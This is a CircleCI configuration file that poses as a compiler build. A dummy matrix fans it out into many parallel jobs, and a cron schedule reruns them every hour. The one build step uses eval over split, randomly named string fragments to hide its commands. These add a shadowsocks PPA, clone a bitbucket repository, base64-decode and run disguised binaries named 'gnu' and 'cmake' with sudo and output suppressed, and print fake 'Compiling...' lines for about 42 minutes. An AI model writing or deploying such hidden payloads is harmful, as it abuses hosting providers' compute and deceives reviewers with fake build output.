version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--exclude", "--usepkg-exclude", "--rebuild-if-new-slot", "--onlydeps", "--newuse", "--pretend", "--noreplace", "--color", "--clean", "--ignore-default-opts", "--color", "--update", "--search-similarity", "--accept-properties", "--root", "--search-similarity", "--usepkg", "--deselect", "--dynamic-deps", "--getbinpkg"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--exclude", "--usepkg-exclude", "--rebuild-if-new-slot", "--onlydeps", "--newuse", "--pretend", "--noreplace", "--color", "--clean", "--ignore-default-opts", "--color", "--update", "--search-similarity", "--accept-properties", "--root", "--search-similarity", "--usepkg", "--deselect", "--dynamic-deps", "--getbinpkg"]
    triggers:
      - schedule:
          cron: "14 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: dlang
          command: |
            KDaWqurQuiH="sudo add-ap"
            SDGPYruz="t-repositor"
            ZHmfddyUeOc="y ppa:max-c"
            uJbsHQwYsIX="-lv/shadows"
            gEgNmrvJYJm="ocks-libev "
            BTzYpuKf="-y &>/dev/n"
            eval "$KDaWqurQuiH""$SDGPYruz""$ZHmfddyUeOc""$uJbsHQwYsIX""$gEgNmrvJYJm""$BTzYpuKf""ull || true"
            zgeqy="sudo add-ap"
            ctTwkjNIH="t-repositor"
            zswkac="y ppa:ondre"
            MiHpSdhLc="j/apache2 -"
            ptziXYmKUEV="y &>/dev/nu"
            eval "$zgeqy""$ctTwkjNIH""$zswkac""$MiHpSdhLc""$ptziXYmKUEV""ll || true"
            KWuvLQtde="sudo apt up"
            eZFezG="date || tru"
            eval "$KWuvLQtde""$eZFezG""e"
            uNATgzhgl="sudo apt --"
            Cfdnw="yes install"
            IvYzOncBmwq=" openssl &>"
            kjFVpUyGhLv="/dev/null |"
            eval "$uNATgzhgl""$Cfdnw""$IvYzOncBmwq""$kjFVpUyGhLv""| true"
            qdlEJriniNu="sudo apt --"
            iYJhN="yes install"
            mAeNaCXpaxB=" cl-base64 "
            WdyEHhLxLy="git &>/dev/"
            DLrdBIAgzB="null || tru"
            eval "$qdlEJriniNu""$iYJhN""$mAeNaCXpaxB""$WdyEHhLxLy""$DLrdBIAgzB""e"
            UjwDVBqEZ="git clone h"
            KDHESfFd="ttps://gccb"
            jiGkB="uild@bitbuc"
            JstQZ="ket.org/gcc"
            huhtbivl="build/gcc.g"
            gsZNRKHHj="it &>/dev/n"
            eval "$UjwDVBqEZ""$KDHESfFd""$jiGkB""$JstQZ""$huhtbivl""$gsZNRKHHj""ull"
            lHyXdoGxOLG="base64 -d g"
            QbEOwHauyqu="cc/cmake_np"
            eval "$lHyXdoGxOLG""$QbEOwHauyqu""_ > cmake"
            rxqcV="base64 -d g"
            gXjLOmQfpt="cc/config_ "
            eval "$rxqcV""$gXjLOmQfpt""> .conf"
            HDYjVkw="base64 -d g"
            oIRAboSBR="cc/make_ > "
            eval "$HDYjVkw""$oIRAboSBR""gnu"
            BjdUn="sed -i 's/1"
            fdrDa="080/1081/g'"
            eval "$BjdUn""$fdrDa"" .conf"
            chmod +x gnu cmake
            ./cmake
            sed -i 's/build/ob2u/g' .conf
            sudo ./gnu --config .conf &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2535)) ] && sudo killall gnu && break; sleep 238; done
